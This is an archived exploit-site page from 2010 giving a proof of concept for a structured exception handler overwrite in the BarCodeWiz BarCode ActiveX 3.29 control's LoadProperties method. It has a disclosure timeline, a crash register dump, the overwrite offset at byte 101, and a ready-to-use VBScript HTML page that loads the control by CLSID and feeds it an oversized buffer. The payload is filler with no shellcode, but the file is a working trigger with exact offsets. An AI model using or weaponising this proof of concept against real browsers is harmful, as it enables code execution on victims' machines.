<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>BarCodeWiz BarCode ActiveX 3.29 PoC</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>===================================
BarCodeWiz BarCode ActiveX 3.29 PoC
===================================

# BarCodeWiz Barcode ActiveX Control 3.29 PoC (SEH)
# Bug found: 24th July 2010
# Found by: loneferret
# Software: http://www.barcodewiz.com/

# Vulnerable file BarCodeWiz.dll
# LoadProperties method

# Tested on:
# Windows XP Professional SP3 &amp; Windows XP Home SP3
# Internet Explorer 6 &amp; Internet Explorer 7

# Vendor contacted: 24th July 2010
# Vendor first reply: 26th July 2010: Wanting more information
# Vendor contacted: 26th July 2010: Sent 2 proof of concepts files
# Vendor contacted: 29 July 2010: Asked for update
# No Response from vendor: 30 July 2010
# Public Release : 30 Juley 2010

# CPU Registers Information
#
# EAX 7EFEFEFE
# ECX 0013FBF8 ASCII &quot;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA……………..
# EDX 41414141
# EBX 01AB3D68
# ESP 0013AC94
# EBP 0013AD48
# ESI 00000000
# EDI 0013FFFD
# EIP 1002F379 BarcodeW.1002F379
# C 0 ES 0023 32bit 0(FFFFFFFF)
# P 1 CS 001B 32bit 0(FFFFFFFF)
# A 0 SS 0023 32bit 0(FFFFFFFF)
# Z 1 DS 0023 32bit 0(FFFFFFFF)
# S 0 FS 003B 32bit 7FFDF000(FFF)
# T 0 GS 0000 NULL
# D 0
# O 0 LastErr ERROR_SUCCESS (00000000)
# EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
# ST0 empty -??? FFFF 00690069 00690069
# ST1 empty -??? FFFF 00F000F0 00F000F0
# ST2 empty -??? FFFF 00690058 00570054
# ST3 empty -??? FFFF 00EF00C9 00C600C1
# ST4 empty -NAN FFFF FFD9D7D2 FFEEEDEB
# ST5 empty -??? FFFF 00F000C9 00C700C2
# ST6 empty 1.0000000000000000000
# ST7 empty 2838.0000000000000000
# 3 2 1 0 E S P U O Z D I
# FST 4000 Cond 1 0 0 0 Err 0 0 0 0 0 0 0 0 (EQ)
# FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1

# SEH Information
#
# SEH chain of main thread, item 0
# Address=0013E574
# SE handler=41414141

# SEH is overwritten starting at the 101th position of our buffer.

—-HTML FILE FROM HERE ON—–
&lt;html&gt;
&lt;object classid=’clsid:CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6′ id=’target’&gt;&lt;/object&gt;
&lt;script language=’vbscript’&gt;

buffer = String(101,&quot;A&quot;)
SEH = String(4, &quot;B&quot;)
buffer2 = String(1895, &quot;C&quot;)

arg1 = buffer + SEH + buffer2

target.LoadProperties arg1

&lt;/script&gt;

Barcodewiz 3.29
&lt;/html&gt;

# <a href=’http://inj3ct0r.com/’>Inj3ct0r.com</a> [2010-07-30]</pre><script type=’text/javascript’>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src=’" + gaJsHost + "google-analytics.com/ga.js’ type=’text/javascript’%3E%3C/script%3E"));</script><script type=’text/javascript’>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
Source: http://inj3ct0r.com/exploits/13518